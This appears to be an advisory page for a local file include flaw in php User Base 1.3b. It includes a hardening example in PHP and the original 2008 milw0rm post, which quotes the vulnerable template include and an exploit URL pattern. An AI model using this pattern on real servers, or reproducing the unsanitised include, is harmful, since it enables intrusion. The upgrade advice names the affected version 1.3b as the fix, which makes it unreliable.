Vendor: php User Base
By: BeyazKurt
CVSS: 8.8 (HIGH)
Type: Local File Include
CWE: 98
Product Name: php User Base
Affected Version From: 1.3b
Affected Version To: 1.3b
Patch Exists: YES
Related CWE: N/A
CPE: a:php_user_base:php_user_base:1.3b
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

php User Base (1.3b) Local File Include

The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'template' parameter to the '/include/unverified.inc.php' script. A remote attacker can include arbitrary local files and execute arbitrary PHP code on the vulnerable system.

Mitigation:

Upgrade to the latest version of php User Base (1.3b) or apply the patch from the vendor.
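
Where the vendor patch cannot be applied, the include in include/unverified.inc.php (quoted in the raw data on this page) can be hardened as in the following added example, which is not the vendor's patch or the project's own code. TEMPLATE_ROOT, DEFAULT_TEMPLATE and resolve_template() are hypothetical names, and the location of the templates/ directory is an assumption.

```php
<?php
// Added example, not the vendor's patch. TEMPLATE_ROOT, DEFAULT_TEMPLATE and
// resolve_template() are hypothetical names. The layout
// templates/<name>/global.inc.php is taken from the include shown on this page.

// Assumption: templates/ sits in the application root, one level above include/.
define('TEMPLATE_ROOT', dirname(__DIR__) . '/templates');
define('DEFAULT_TEMPLATE', 'default'); // assumption: a template with this name exists

/**
 * Map a requested template name to the absolute path of its global.inc.php,
 * or return null if the name is not a plain directory name under $root.
 */
function resolve_template($name, $root = TEMPLATE_ROOT)
{
    // 1. Syntax: accept only a short plain identifier. This rejects "../", "/",
    //    "\", NUL bytes, URL schemes and array input (?template[]=x).
    if (!is_string($name) || !preg_match('/\A[A-Za-z0-9_-]{1,32}\z/', $name)) {
        return null;
    }

    // 2. Containment: canonicalise both paths and require the target to sit
    //    inside the template root, which also catches symlinks pointing elsewhere.
    $base = realpath($root);
    $file = realpath($root . '/' . $name . '/global.inc.php');
    if ($base === false || $file === false) {
        return null; // root or template file does not exist
    }
    if (strncmp($file, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $file;
}

// Read the value explicitly from the request instead of relying on a global
// variable that the query string can populate.
$requested = isset($_GET['template']) ? $_GET['template'] : DEFAULT_TEMPLATE;
$path = resolve_template($requested);
if ($path === null) {
    $path = resolve_template(DEFAULT_TEMPLATE); // fall back to the known-good template
}
if ($path === null) {
    header('HTTP/1.1 500 Internal Server Error');
    exit('Template not available');
}
include $path;
```

Rejected names are worth logging: a request whose template value contains path separators or dots is a useful detection signal for probing of this parameter.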

Exploit-DB raw data:

#####################################################
#Author : BeyazKurt - Bey4zKurt@Gmail.Com
#
#Script : php User Base (1.3b)
#Risk : Local File Include
#Download : http://sourceforge.net/project/showfiles.php?group_id=200632
#
#File : include/unverified.inc.php
#
#Code :
#
# <?php
#   include("./templates/$template/global.inc.php");
# ?>
#
#Exploit :
#
# Vuln.Com/include/unverified.inc.php?template=CODE
#
#----------------------------
#
#                            INDEPENDENT KOSOVA (H)
#
#Not : I Love You Gülsüm (F)
#Thnx : " XbrainhunterX (Mehmet Akif) XX Parti :D "
#####################################################

# milw0rm.com [2008-02-23]